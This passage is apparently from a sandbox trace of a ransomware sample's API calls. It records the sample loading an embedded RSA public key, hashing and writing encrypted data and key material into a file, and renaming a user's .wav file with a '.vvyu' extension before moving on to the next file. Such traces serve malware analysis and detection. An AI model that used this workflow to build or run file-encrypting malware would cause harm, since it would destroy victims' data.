KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.014] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.014] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0197.015] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0197.015] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.015] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0197.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0197.016] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0197.016] GetLastError () returned 0x0 [0197.016] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0197.016] CryptReleaseContext (hProv=0x6ea920, dwFlags=0x0) returned 1 [0197.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0197.016] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0197.016] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0197.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.016] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0197.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa3a0) returned 0x2d4d778 [0197.017] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0197.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0197.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0197.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d040 [0197.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2e8 [0197.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d088 [0197.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a300 [0197.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a330 [0197.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a390 [0197.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a348 [0197.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0197.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0197.018] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0197.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0197.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a330 | out: hHeap=0x6a0000) returned 1 [0197.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a348 | out: hHeap=0x6a0000) returned 1 [0197.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a390 | out: hHeap=0x6a0000) returned 1 [0197.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0197.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a390 [0197.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0197.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a348 [0197.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0197.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a330 [0197.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0197.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0197.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0197.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0197.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0197.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bec8 [0197.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0197.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0197.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a348 | out: hHeap=0x6a0000) returned 1 [0197.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a330 | out: hHeap=0x6a0000) returned 1 [0197.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a390 | out: hHeap=0x6a0000) returned 1 [0197.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0197.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0197.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0197.020] GetCurrentThreadId () returned 0x264 [0197.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0197.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4b790 [0197.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0197.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0197.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0197.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0197.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0197.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.021] GetCurrentThreadId () returned 0x264 [0197.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0197.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0197.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0197.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0197.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0197.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a390 [0197.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0197.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0197.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0197.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0197.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a330 [0197.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0197.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0197.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0197.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0197.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a348 [0197.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0197.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0197.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0197.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a318 [0197.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0197.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a3a8 [0197.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0197.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a378 [0197.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a360 [0197.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a3c0 [0197.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a360 | out: hHeap=0x6a0000) returned 1 [0197.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a360 [0197.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a378 | out: hHeap=0x6a0000) returned 1 [0197.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0197.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0197.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0197.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a330 | out: hHeap=0x6a0000) returned 1 [0197.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a330 [0197.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0197.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a390 | out: hHeap=0x6a0000) returned 1 [0197.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0197.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3c0 | out: hHeap=0x6a0000) returned 1 [0197.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0197.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0197.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0197.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bfe0 [0197.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a330 | out: hHeap=0x6a0000) returned 1 [0197.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0197.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0197.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0197.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0197.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0197.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0197.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0197.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0197.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0197.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a360 | out: hHeap=0x6a0000) returned 1 [0197.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3a8 | out: hHeap=0x6a0000) returned 1 [0197.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a348 | out: hHeap=0x6a0000) returned 1 [0197.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a318 | out: hHeap=0x6a0000) returned 1 [0197.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0197.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0197.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0197.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a300 | out: hHeap=0x6a0000) returned 1 [0197.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d088 | out: hHeap=0x6a0000) returned 1 [0197.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0197.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0197.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0197.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0197.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0197.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0197.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0197.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0197.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0197.031] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4d778*, nNumberOfBytesToWrite=0xa39a, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4d778*, lpNumberOfBytesWritten=0x30ffb14*=0xa39a, lpOverlapped=0x0) returned 1 [0197.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d778 | out: hHeap=0x6a0000) returned 1 [0197.032] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xa39f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.032] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0197.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0197.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0197.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0197.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0197.034] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0197.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.034] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.034] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0197.035] CloseHandle (hObject=0x52c) returned 1 [0197.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd0) returned 0x2d4d790 [0197.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8d0) returned 0x2d3a670 [0197.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0197.037] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\brlU 5vGds.wav" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\brlu 5vgds.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\brlU 5vGds.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\brlu 5vgds.wav.vvyu")) returned 1 [0197.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0197.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.039] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0197.042] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a193820, ftCreationTime.dwHighDateTime=0x1d8a05e, ftLastAccessTime.dwLowDateTime=0x54062f90, ftLastAccessTime.dwHighDateTime=0x1d8a647, ftLastWriteTime.dwLowDateTime=0x54062f90, ftLastWriteTime.dwHighDateTime=0x1d8a647, nFileSizeHigh=0x0, nFileSizeLow=0x1ab9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cYVyaoVP6_8ikj.m4a", cAlternateFileName="CYVYAO~1.M4A")) returned 1 [0197.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x106) returned 0x2c4bb80 [0197.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.042] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X 